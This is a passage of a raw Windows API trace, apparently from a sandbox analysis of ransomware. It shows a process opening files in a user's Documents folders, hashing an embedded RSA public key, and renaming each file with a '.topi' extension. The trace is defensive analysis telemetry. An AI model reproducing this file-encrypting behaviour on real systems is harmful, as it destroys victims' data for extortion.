HALPmcxz\\Documents\\lt6ZzNEQACj\\wNZ Bd.ods") returned=".ods" [0096.159] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\wNZ Bd.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\wnz bd.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.159] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=69635) returned 1 [0096.160] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.162] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x10fdd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.162] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.163] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.163] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x11003, lpOverlapped=0x0) returned 1 [0096.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.164] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.165] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.165] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.165] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.165] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.165] GetLastError () returned 0x0 [0096.165] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.165] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.165] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.165] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.165] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11000) returned 0x9a06a00 [0096.166] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a025a0 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9810 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a025e8 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9828 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9858 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9870 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.166] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0096.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9858 | out: hHeap=0x680000) returned 1 [0096.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9870 | out: hHeap=0x680000) returned 1 [0096.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9870 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9858 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9870 | out: hHeap=0x680000) returned 1 [0096.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9858 | out: hHeap=0x680000) returned 1 [0096.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.167] GetCurrentThreadId () returned 0x8c4 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7890 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.167] GetCurrentThreadId () returned 0x8c4 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9858 [0096.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9870 [0096.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9840 [0096.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.169] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\wNZ Bd.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\wnz bd.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\wNZ Bd.ods.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\wnz bd.ods.topi")) returned 1 [0096.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.170] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31532f8 | out: hHeap=0x680000) returned 1 [0096.171] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x546d3f30, ftCreationTime.dwHighDateTime=0x1d5bc7c, ftLastAccessTime.dwLowDateTime=0x357a4ae0, ftLastAccessTime.dwHighDateTime=0x1d5b5b6, ftLastWriteTime.dwLowDateTime=0x357a4ae0, ftLastWriteTime.dwHighDateTime=0x1d5b5b6, nFileSizeHigh=0x0, nFileSizeLow=0x11003, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wNZ Bd.ods", cAlternateFileName="WNZBD~1.ODS")) returned 0 [0096.171] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0096.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0096.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3da8 | out: hHeap=0x680000) returned 1 [0096.171] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.171] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.171] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0096.171] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0096.171] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.172] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.172] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.172] PathFindFileNameW (pszPath="") returned="" [0096.172] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.172] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.172] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0096.172] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0096.172] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.172] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.172] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.172] PathFindFileNameW (pszPath="") returned="" [0096.172] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.172] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.173] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0096.173] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0096.173] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.173] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.173] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.173] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.173] PathFindFileNameW (pszPath="") returned="" [0096.173] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned=".ini" [0096.173] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31532f8 | out: hHeap=0x680000) returned 1 [0096.173] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0096.173] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned=".vss" [0096.173] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.183] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=0) returned 1 [0096.183] CloseHandle (hObject=0x6a8) returned 1 [0096.185] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.topi")) returned 1 [0096.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31532f8 | out: hHeap=0x680000) returned 1 [0096.185] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0096.185] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.185] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0096.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0096.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.186] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.186] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.186] PathFindFileNameW (pszPath="") returned="" [0096.186] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.186] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0096.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0096.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.186] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.186] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.186] PathFindFileNameW (pszPath="") returned="" [0096.186] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned=".pst" [0096.187] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: 